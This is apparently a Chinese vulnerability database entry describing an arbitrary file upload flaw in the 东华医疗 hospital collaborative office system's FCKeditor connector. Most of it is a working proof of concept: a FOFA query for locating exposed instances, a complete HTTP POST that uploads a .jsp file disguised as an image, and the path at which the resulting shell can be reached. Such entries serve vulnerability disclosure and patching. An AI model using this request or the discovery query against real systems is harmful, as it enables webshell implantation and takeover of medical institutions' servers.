东华医疗协同办公系统文件上传

日期: 2024-01-05 | 影响软件: 东华医疗协同办公系统 | POC: 已公开

漏洞描述

东华医疗协同办公系统 connector接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web服务器。

PoC代码

## 东华医疗协同办公系统文件上传



## fofa

```

body="东华医疗协同办公系统"

```



## poc

```

POST /common/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=&CurrentFolder=/ HTTP/1.1

Host: xx.xx.xx.xx

Cookie: JSESSIONID=17A17E4D9E4E38B72D650895AFF7D1DF

Content-Length: 284

Cache-Control: max-age=0

Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"

Sec-Ch-Ua-Mobile: ?0

Sec-Ch-Ua-Platform: "Windows"

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36

Origin: https://xx.xx.xx.xx

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt1qdEWTI01cj5BLV

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Connection: close



------WebKitFormBoundaryt1qdEWTI01cj5BLV

Content-Disposition: form-data; name="NewFile"; filename="123.jsp"

Content-Type: image/jpeg



123

------WebKitFormBoundaryt1qdEWTI01cj5BLV

Content-Disposition: form-data; name="Submit"



upload

------WebKitFormBoundaryt1qdEWTI01cj5BLV--

```



shell: https://xx.xx.xx.xx/common/FCKeditor/UserFiles/123.jsp

相关漏洞推荐